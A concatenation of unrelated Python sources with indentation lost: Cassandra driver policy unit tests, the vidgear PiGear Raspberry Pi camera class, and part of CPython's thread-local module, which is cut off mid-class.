def test_wrap_dc_aware(self):
cluster = Mock(spec=Cluster)
cluster.metadata = Mock(spec=Metadata)
hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
for host in hosts:
host.set_up()
for h in hosts[:2]:
h.set_location_info("dc1", "rack1")
for h in hosts[2:]:
h.set_location_info("dc2", "rack1")
def get_replicas(keyspace, packed_key):
index = struct.unpack('>i', packed_key)[0]
# return one node from each DC
if index % 2 == 0:
return [hosts[0], hosts[2]]
else:
return [hosts[1], hosts[3]]
cluster.metadata.get_replicas.side_effect = get_replicas
policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1))
policy.populate(cluster, hosts)
for i in range(4):
query = Statement(routing_key=struct.pack('>i', i), keyspace='keyspace_name')
qplan = list(policy.make_query_plan(None, query))
replicas = get_replicas(None, struct.pack('>i', i))
# first should be the only local replica
self.assertIn(qplan[0], replicas)
self.assertEqual(qplan[0].datacenter, "dc1")
# then the local non-replica
self.assertNotIn(qplan[1], replicas)
self.assertEqual(qplan[1].datacenter, "dc1")
# then one of the remotes (used_hosts_per_remote_dc is 1, so we
# shouldn't see two remotes)
self.assertEqual(qplan[2].datacenter, "dc2")
self.assertEqual(3, len(qplan))
class FakeCluster:
def __init__(self):
self.metadata = Mock(spec=Metadata)
def test_get_distance(self):
"""
Same test as DCAwareRoundRobinPolicyTest.test_get_distance()
Except a FakeCluster is needed for the metadata variable and
policy.child_policy is needed to change child policy settings
"""
policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0))
host = Host("ip1", SimpleConvictionPolicy)
host.set_location_info("dc1", "rack1")
policy.populate(self.FakeCluster(), [host])
self.assertEqual(policy.distance(host), HostDistance.LOCAL)
# used_hosts_per_remote_dc is set to 0, so ignore it
remote_host = Host("ip2", SimpleConvictionPolicy)
remote_host.set_location_info("dc2", "rack1")
self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
# dc2 isn't registered in the policy's live_hosts dict
policy._child_policy.used_hosts_per_remote_dc = 1
self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
# make sure the policy has both dcs registered
policy.populate(self.FakeCluster(), [host, remote_host])
self.assertEqual(policy.distance(remote_host), HostDistance.REMOTE)
# since used_hosts_per_remote_dc is set to 1, only the first
# remote host in dc2 will be REMOTE, the rest are IGNORED
second_remote_host = Host("ip3", SimpleConvictionPolicy)
second_remote_host.set_location_info("dc2", "rack1")
policy.populate(self.FakeCluster(), [host, remote_host, second_remote_host])
distances = set([policy.distance(remote_host), policy.distance(second_remote_host)])
self.assertEqual(distances, set([HostDistance.REMOTE, HostDistance.IGNORED]))
def test_status_updates(self):
"""
Same test as DCAwareRoundRobinPolicyTest.test_status_updates()
"""
hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
for h in hosts[:2]:
h.set_location_info("dc1", "rack1")
for h in hosts[2:]:
h.set_location_info("dc2", "rack1")
policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1))
policy.populate(self.FakeCluster(), hosts)
policy.on_down(hosts[0])
policy.on_remove(hosts[2])
new_local_host = Host(4, SimpleConvictionPolicy)
new_local_host.set_location_info("dc1", "rack1")
policy.on_up(new_local_host)
new_remote_host = Host(5, SimpleConvictionPolicy)
new_remote_host.set_location_info("dc9000", "rack1")
policy.on_add(new_remote_host)
# we now have two local hosts and two remote hosts in separate dcs
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan[:2]), set([hosts[1], new_local_host]))
self.assertEqual(set(qplan[2:]), set([hosts[3], new_remote_host]))
# since we have hosts in dc9000, the distance shouldn't be IGNORED
self.assertEqual(policy.distance(new_remote_host), HostDistance.REMOTE)
policy.on_down(new_local_host)
policy.on_down(hosts[1])
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan), set([hosts[3], new_remote_host]))
policy.on_down(new_remote_host)
policy.on_down(hosts[3])
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [])
def test_statement_keyspace(self):
hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
for host in hosts:
host.set_up()
cluster = Mock(spec=Cluster)
cluster.metadata = Mock(spec=Metadata)
replicas = hosts[2:]
cluster.metadata.get_replicas.return_value = replicas
child_policy = Mock()
child_policy.make_query_plan.return_value = hosts
child_policy.distance.return_value = HostDistance.LOCAL
policy = TokenAwarePolicy(child_policy)
policy.populate(cluster, hosts)
# no keyspace, child policy is called
keyspace = None
routing_key = 'routing_key'
query = Statement(routing_key=routing_key)
qplan = list(policy.make_query_plan(keyspace, query))
self.assertEqual(hosts, qplan)
self.assertEqual(cluster.metadata.get_replicas.call_count, 0)
child_policy.make_query_plan.assert_called_once_with(keyspace, query)
# working keyspace, no statement
cluster.metadata.get_replicas.reset_mock()
keyspace = 'working_keyspace'
routing_key = 'routing_key'
query = Statement(routing_key=routing_key)
qplan = list(policy.make_query_plan(keyspace, query))
self.assertEqual(replicas + hosts[:2], qplan)
cluster.metadata.get_replicas.assert_called_with(keyspace, routing_key)
# statement keyspace, no working
cluster.metadata.get_replicas.reset_mock()
working_keyspace = None
statement_keyspace = 'statement_keyspace'
routing_key = 'routing_key'
query = Statement(routing_key=routing_key, keyspace=statement_keyspace)
qplan = list(policy.make_query_plan(working_keyspace, query))
self.assertEqual(replicas + hosts[:2], qplan)
cluster.metadata.get_replicas.assert_called_with(statement_keyspace, routing_key)
# both keyspaces set, statement keyspace used for routing
cluster.metadata.get_replicas.reset_mock()
working_keyspace = 'working_keyspace'
statement_keyspace = 'statement_keyspace'
routing_key = 'routing_key'
query = Statement(routing_key=routing_key, keyspace=statement_keyspace)
qplan = list(policy.make_query_plan(working_keyspace, query))
self.assertEqual(replicas + hosts[:2], qplan)
cluster.metadata.get_replicas.assert_called_with(statement_keyspace, routing_key)
class ConvictionPolicyTest(unittest.TestCase):
def test_not_implemented(self):
"""
Code coverage for interface-style base class
"""
conviction_policy = ConvictionPolicy(1)
self.assertRaises(NotImplementedError, conviction_policy.add_failure, 1)
self.assertRaises(NotImplementedError, conviction_policy.reset)
class SimpleConvictionPolicyTest(unittest.TestCase):
def test_basic_responses(self):
"""
Code coverage for SimpleConvictionPolicy
"""
conviction_policy = SimpleConvictionPolicy(1)
self.assertEqual(conviction_policy.add_failure(1), True)
self.assertEqual(conviction_policy.reset(), None)
class ReconnectionPolicyTest(unittest.TestCase):
def test_basic_responses(self):
"""
Code coverage for interface-style base class
"""
policy = ReconnectionPolicy()
self.assertRaises(NotImplementedError, policy.new_schedule)
class ConstantReconnectionPolicyTest(unittest.TestCase):
def test_bad_vals(self):
"""
Test initialization values
"""
self.assertRaises(ValueError, ConstantReconnectionPolicy, -1, 0)
def test_schedule(self):
"""
Test ConstantReconnectionPolicy schedule
"""
delay = 2
max_attempts = 100
policy = ConstantReconnectionPolicy(delay=delay, max_attempts=max_attempts)
schedule = list(policy.new_schedule())
self.assertEqual(len(schedule), max_attempts)
for i, delay in enumerate(schedule):
self.assertEqual(delay, delay)
def test_schedule_negative_max_attempts(self):
"""
Test how negative max_attempts are handled
"""
delay = 2
max_attempts = -100
try:
ConstantReconnectionPolicy(delay=delay, max_attempts=max_attempts)
self.fail('max_attempts should throw ValueError when negative')
except ValueError:
pass
def test_schedule_infinite_attempts(self):
delay = 2
max_attempts = None
crp = ConstantReconnectionPolicy(delay=delay, max_attempts=max_attempts)
# this is infinite. we'll just verify one more than default
for _, d in zip(range(65), crp.new_schedule()):
self.assertEqual(d, delay)
class ExponentialReconnectionPolicyTest(unittest.TestCase):
def test_bad_vals(self):
self.assertRaises(ValueError, ExponentialReconnectionPolicy, -1, 0)
self.assertRaises(ValueError, ExponentialReconnectionPolicy, 0, -1)
self.assertRaises(ValueError, ExponentialReconnectionPolicy, 9000, 1)
self.assertRaises(ValueError, ExponentialReconnectionPolicy, 1, 2,-1)
def test_schedule_no_max(self):
base_delay = 2
max_delay = 100
test_iter = 10000
policy = ExponentialReconnectionPolicy(base_delay=base_delay, max_delay=max_delay, max_attempts=None)
sched_slice = list(islice(policy.new_schedule(), 0, test_iter))
self.assertEqual(sched_slice[0], base_delay)
self.assertEqual(sched_slice[-1], max_delay)
self.assertEqual(len(sched_slice), test_iter)
def test_schedule_with_max(self):
base_delay = 2
max_delay = 100
max_attempts = 64
policy = ExponentialReconnectionPolicy(base_delay=base_delay, max_delay=max_delay, max_attempts=max_attempts)
schedule = list(policy.new_schedule())
self.assertEqual(len(schedule), max_attempts)
for i, delay in enumerate(schedule):
if i == 0:
self.assertEqual(delay, base_delay)
elif i < 6:
self.assertEqual(delay, schedule[i - 1] * 2)
else:
self.assertEqual(delay, max_delay)
ONE = ConsistencyLevel.ONE
class RetryPolicyTest(unittest.TestCase):
def test_read_timeout(self):
policy = RetryPolicy()
# if this is the second or greater attempt, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=1, received_responses=2,
data_retrieved=True, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# if we didn't get enough responses, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=1,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# if we got enough responses, but also got a data response, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=2,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# we got enough responses but no data response, so retry
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=2,
data_retrieved=False, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ONE)
def test_write_timeout(self):
policy = RetryPolicy()
# if this is the second or greater attempt, rethrow
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.SIMPLE,
required_responses=1, received_responses=2, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# if it's not a BATCH_LOG write, don't retry it
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.SIMPLE,
required_responses=1, received_responses=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# retry BATCH_LOG writes regardless of received responses
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
required_responses=10000, received_responses=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ONE)
def test_unavailable(self):
"""
Use the same tests for test_write_timeout, but ensure they only RETHROW
"""
policy = RetryPolicy()
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=1, alive_replicas=2, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=1, alive_replicas=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY_NEXT_HOST)
self.assertEqual(consistency, ONE)
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=10000, alive_replicas=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY_NEXT_HOST)
self.assertEqual(consistency, ONE)
class FallthroughRetryPolicyTest(unittest.TestCase):
"""
Use the same tests for test_write_timeout, but ensure they only RETHROW
"""
def test_read_timeout(self):
policy = FallthroughRetryPolicy()
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=1, received_responses=2,
data_retrieved=True, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=1,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=2,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=2,
data_retrieved=False, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
def test_write_timeout(self):
policy = FallthroughRetryPolicy()
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.SIMPLE,
required_responses=1, received_responses=2, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.SIMPLE,
required_responses=1, received_responses=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
required_responses=10000, received_responses=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
def test_unavailable(self):
policy = FallthroughRetryPolicy()
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=1, alive_replicas=2, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=1, alive_replicas=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE,
required_replicas=10000, alive_replicas=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
class DowngradingConsistencyRetryPolicyTest(unittest.TestCase):
def test_read_timeout(self):
policy = DowngradingConsistencyRetryPolicy()
# if this is the second or greater attempt, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=1, received_responses=2,
data_retrieved=True, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# if we didn't get enough responses, retry at a lower consistency
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=4, received_responses=3,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ConsistencyLevel.THREE)
# if we didn't get enough responses, retry at a lower consistency
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=3, received_responses=2,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ConsistencyLevel.TWO)
# retry consistency level goes down based on the # of recv'd responses
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=3, received_responses=1,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ConsistencyLevel.ONE)
# if we got no responses, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=3, received_responses=0,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# if we got enough response but no data, retry
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=3, received_responses=3,
data_retrieved=False, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ONE)
# if we got enough responses, but also got a data response, rethrow
retry, consistency = policy.on_read_timeout(
query=None, consistency=ONE, required_responses=2, received_responses=2,
data_retrieved=True, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
def test_write_timeout(self):
policy = DowngradingConsistencyRetryPolicy()
# if this is the second or greater attempt, rethrow
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.SIMPLE,
required_responses=1, received_responses=2, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
for write_type in (WriteType.SIMPLE, WriteType.BATCH, WriteType.COUNTER):
# ignore failures if at least one response (replica persisted)
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=write_type,
required_responses=1, received_responses=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.IGNORE)
# retrhow if we can't be sure we have a replica
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=write_type,
required_responses=1, received_responses=0, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
# downgrade consistency level on unlogged batch writes
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.UNLOGGED_BATCH,
required_responses=3, received_responses=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ConsistencyLevel.ONE)
# retry batch log writes at the same consistency level
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=WriteType.BATCH_LOG,
required_responses=3, received_responses=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ONE)
# timeout on an unknown write_type
retry, consistency = policy.on_write_timeout(
query=None, consistency=ONE, write_type=None,
required_responses=1, received_responses=2, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
def test_unavailable(self):
policy = DowngradingConsistencyRetryPolicy()
# if this is the second or greater attempt, rethrow
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE, required_replicas=3, alive_replicas=1, retry_num=1)
self.assertEqual(retry, RetryPolicy.RETHROW)
self.assertEqual(consistency, None)
# downgrade consistency on unavailable exceptions
retry, consistency = policy.on_unavailable(
query=None, consistency=ONE, required_replicas=3, alive_replicas=1, retry_num=0)
self.assertEqual(retry, RetryPolicy.RETRY)
self.assertEqual(consistency, ConsistencyLevel.ONE)
class WhiteListRoundRobinPolicyTest(unittest.TestCase):
def test_hosts_with_hostname(self):
hosts = ['localhost']
policy = WhiteListRoundRobinPolicy(hosts)
host = Host("127.0.0.1", SimpleConvictionPolicy)
policy.populate(None, [host])
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), [host])
self.assertEqual(policy.distance(host), HostDistance.LOCAL)
|
pigear.py | """
===============================================
vidgear library source-code is deployed under the Apache 2.0 License:
Copyright (c) 2019 Abhishek Thakur(@abhiTronix) <abhi.una12@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================
"""
# import the packages
from threading import Thread
from pkg_resources import parse_version
import sys, time
from .helper import capPropId
try:
# import OpenCV Binaries
import cv2
# check whether OpenCV Binaries are 3.x+
if parse_version(cv2.__version__) < parse_version('3'):
raise ImportError('[ERROR]: OpenCV library version >= 3.0 is only supported by this library')
except ImportError as error:
raise ImportError('[ERROR]: Failed to detect OpenCV executables, install it with `pip3 install opencv-python` command.')
class PiGear:
"""
PiGear is similar to CamGear but exclusively made to support various Raspberry Pi Camera Modules
(such as OmniVision OV5647 Camera Module and Sony IMX219 Camera Module). To interface with these
modules correctly, PiGear provides a flexible multi-threaded wrapper around complete picamera
python library and provides us the ability to exploit its various features like `brightness, saturation, sensor_mode`, etc. effortlessly.
:param (tuple) resolution: sets the resolution (width,height). Its default value is (640,480).
:param (integer) framerate: sets the framerate. Its default value is 25.
:param (string) colorspace: set colorspace of the video stream. Its default value is None.
:param (dict) **options: sets parameter supported by PiCamera Class to the input video stream.
/ These attribute provides the flexibility to manipulate input raspicam video stream directly.
/ Parameters can be passed using this **option, allows you to pass key worded variable length of arguments to PiGear Class.
:param (boolean) logging: set this flag to enable/disable error logging essential for debugging. Its default value is False.
:param (integer) time_delay: sets time delay(in seconds) before start reading the frames.
/ This delay is essentially required for camera to warm-up.
/ Its default value is 0.
"""
def __init__(self, camera_num = 0, resolution = (640, 480), framerate = 30, colorspace = None, logging = False, time_delay = 0, **options):
try:
import picamera
from picamera.array import PiRGBArray
from picamera import PiCamera
except Exception as error:
if isinstance(error, ImportError):
# Output expected ImportErrors.
raise ImportError('[ERROR]: Failed to detect Picamera executables, install it with "pip3 install picamera" command.')
else:
#Handle any API errors
raise RuntimeError('[ERROR]: Picamera API failure: {}'.format(error))
assert (isinstance(framerate, (int, float)) and framerate > 5.0), "[ERROR]: Input framerate value `{}` is a Invalid! Kindly read docs.".format(framerate)
assert (isinstance(resolution, (tuple, list)) and len(resolution) == 2), "[ERROR]: Input resolution value `{}` is a Invalid! Kindly read docs.".format(resolution)
if not(isinstance(camera_num, int) and camera_num >= 0): print("[ERROR]: `camera_num` value is invalid, Kindly read docs!")
# initialize the picamera stream at given index
self.camera = PiCamera(camera_num = camera_num)
self.camera.resolution = tuple(resolution)
self.camera.framerate = framerate
if logging: print("[LOG]: Activating Pi camera at index: {} with resolution: {} & framerate: {}".format(camera_num, resolution, framerate))
#initialize framerate variable
self.framerate = framerate
#initializing colorspace variable
self.color_space = None
#reformat dict
options = {k.strip(): v for k,v in options.items()}
#define timeout variable default value(handles hardware failures)
self.failure_timeout = 2.0
#User-Defined parameter
if options and "HWFAILURE_TIMEOUT" in options:
#for altering timeout variable manually
if isinstance(options["HWFAILURE_TIMEOUT"],(int, float)):
if not(10.0 > options["HWFAILURE_TIMEOUT"] > 1.0): raise ValueError('[ERROR]: `HWFAILURE_TIMEOUT` value can only be between 1.0 ~ 10.0')
self.failure_timeout = options["HWFAILURE_TIMEOUT"] #assign special parameter
if logging: print("[LOG]: Setting HW Failure Timeout: {} seconds".format(self.failure_timeout))
del options["HWFAILURE_TIMEOUT"] #clean
try:
# apply attributes to source if specified
for key, value in options.items():
setattr(self.camera, key, value)
# separately handle colorspace value to int conversion
if not(colorspace is None):
self.color_space = capPropId(colorspace.strip())
if logging: print('[LOG]: Enabling `{}` colorspace for this video stream!'.format(colorspace.strip()))
except Exception as e:
# Catch if any error occurred
if logging: print(e)
# enable rgb capture array thread and capture stream
self.rawCapture = PiRGBArray(self.camera, size = resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,format="bgr", use_video_port=True)
#frame variable initialization
self.frame = None
try:
stream = next(self.stream)
self.frame = stream.array
self.rawCapture.seek(0)
self.rawCapture.truncate()
#render colorspace if defined
if not(self.frame is None and self.color_space is None): self.frame = cv2.cvtColor(self.frame, self.color_space)
except Exception as e:
print(e)
raise RuntimeError('[ERROR]: Camera Module failed to initialize!')
# applying time delay to warm-up picamera only if specified
if time_delay: time.sleep(time_delay)
#thread initialization
self.thread = None
#timer thread initialization(Keeps check on frozen thread)
self._timer = None
self.t_elasped = 0.0 #records time taken by thread
# enable logging if specified
self.logging = logging
# catching thread exceptions
self.exceptions = None
# initialize termination flag
self.terminate = False
def start(self):
"""
start the thread to read frames from the video stream and initiate internal timer
"""
#Start frame producer thread
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.thread.start()
#Start internal timer thread
self._timer = Thread(target=self._timeit, args=())
self._timer.daemon = True
self._timer.start()
return self
def _timeit(self):
"""
Keep checks on Thread excecution timing
"""
#assign current time
self.t_elasped = time.time()
#loop until termainated
while not(self.terminate):
#check for frozen thread
if time.time() - self.t_elasped > self.failure_timeout:
#log failure
if self.logging: print("[WARNING]: Camera Module Disconnected!")
#prepare for clean exit
self.exceptions = True
self.terminate = True #self-terminate
def update(self):
"""
Update frames from stream
"""
#keep looping infinitely until the thread is terminated
while True:
#check for termination flag
if self.terminate: break
try:
#Try to iterate next frame from generator
stream = next(self.stream)
except Exception:
#catch and save any exceptions
self.exceptions = sys.exc_info()
break #exit
#update timer
self.t_elasped = time.time()
# grab the frame from the stream and clear the stream in
# preparation for the next frame
frame = stream.array
self.rawCapture.seek(0)
self.rawCapture.truncate()
#apply colorspace if specified
if not(self.color_space is None):
# apply colorspace to frames
color_frame = None
try:
if isinstance(self.color_space, int):
color_frame = cv2.cvtColor(frame, self.color_space)
else:
self.color_space = None
if self.logging: print('[LOG]: Colorspace value `{}` is not a valid colorspace!'.format(self.color_space))
except Exception as e:
# Catch if any error occurred
self.color_space = None
if self.logging:
print(e)
print('[WARNING]: Input colorspace is not a valid Colorspace!')
if not(color_frame is None):
self.frame = color_frame
else:
self.frame = frame
else:
self.frame = frame
# terminate processes
if not(self.terminate): self.terminate = True
# release picamera resources
self.stream.close()
self.rawCapture.close()
self.camera.close()
def read(self):
"""
return the frame
"""
#check if there are any thread exceptions
if not(self.exceptions is None):
if isinstance(self.exceptions, bool):
#clear frame
self.frame = None
#notify user about hardware failure
raise SystemError('[ERROR]: Hardware failure occurred, Kindly reconnect Camera Module and restart your Pi!')
else:
#clear frame
self.frame = None
# re-raise error for debugging
error_msg = "[ERROR]: Camera Module API failure occured: {}".format(self.exceptions[1])
raise RuntimeError(error_msg).with_traceback(self.exceptions[2])
# return the frame
return self.frame
def stop(self):
"""
Terminates the Read process
"""
if self.logging: print("[LOG]: Terminating PiGear Process.")
# make sure that the threads should be terminated
self.terminate = True
#stop timer thread
if not(self._timer is None): self._timer.join()
#handle camera thread
if not(self.thread is None):
#check if hardware failure occured
if not(self.exceptions is None) and isinstance(self.exceptions, bool):
# force release picamera resources
self.stream.close()
self.rawCapture.close()
self.camera.close()
#properly handle thread exit
self.thread.terminate()
self.thread.wait() #wait if still process is still processing some information
self.thread = None
else:
#properly handle thread exit
self.thread.join() |
_threading_local.py | from threading import current_thread, RLock
"""Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = sorted(mydata.__dict__.items())
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... def __init__(self, **kw):
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red')], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
from weakref import ref
from contextlib import contextmanager
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that all platforms on CPython do have support
# for locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest.
class _localimpl:
"""A class managing thread-local dicts"""
__slots__ = 'key', 'dicts', 'localargs', 'locallock', '__weakref__'
def __init__(self):
# The key used in the Thread objects' attribute dicts.
# We keep it a string for speed but make it unlikely to clash with
# a "real" attribute.
self.key = '_threading_local._localimpl.' + str(id(self))
# { id(Thread) -> (ref(Thread), thread-local dict) }
self.dicts = {}
def get_dict(self):
"""Return the dict for the current thread. Raises KeyError if none
defined."""
thread = current_thread()
return self.dicts[id(thread)][1]
def create_dict(self):
"""Create a new dict for the current thread, and return it."""
localdict = {}
key = self.key
thread = current_thread()
idt = id(thread)
def local_deleted(_, key=key):
# When the localimpl is deleted, remove the thread attribute.
thread = wrthread()
if thread is not None:
del thread.__dict__[key]
def thread_deleted(_, idt=idt):
# When the thread is deleted, remove the local dict.
# Note that this is suboptimal if the thread object gets
# caught in a reference loop. We would like to be called
# as soon as the OS-level thread ends instead.
local = wrlocal()
if local is not None:
dct = local.dicts.pop(idt)
wrlocal = ref(self, local_deleted)
wrthread = ref(thread, thread_deleted)
thread.__dict__[key] = wrlocal
self.dicts[idt] = wrthread, localdict
return localdict
@contextmanager
def _patch(self):
impl = object.__getattribute__(self, '_local__impl')
try:
dct = impl.get_dict()
except KeyError:
dct = impl.create_dict()
args, kw = impl.localargs
self.__init__(*args, **kw)
with impl.locallock:
object.__setattr__(self, '__dict__', dct)
yield
class local:
__slots__ = '_local__impl', '__dict__'
def __new__(cls, *args, **kw):
if (args or kw) and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
self = object.__new__(cls)
impl = _localimpl()
impl.localargs = (args, kw)
impl.locallock = RLock()
object.__setattr__(self, '_local__impl', impl)
